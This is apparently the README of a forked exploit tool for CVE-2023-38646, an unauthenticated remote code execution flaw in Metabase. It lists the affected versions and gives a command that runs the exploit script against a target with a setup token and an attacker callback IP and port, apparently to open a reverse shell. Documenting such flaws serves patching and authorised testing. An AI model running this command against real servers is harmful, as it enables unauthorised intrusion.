
CVE-2023-38646 RCE Pré-Autenticação no Metabase
Fork de kh4sh3i removendo a necessidade do Burp Collector.
CVE-2023-38646 (RCE sem autenticação no Metabase):
Metabase open source anterior à versão 0.46.6.1 e Metabase Enterprise anterior à 1.46.6.1 permitem que atacantes executem comandos arbitrários no servidor, no nível de privilégio do servidor. Autenticação não é necessária para exploração.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
Para mais informações, leia este post.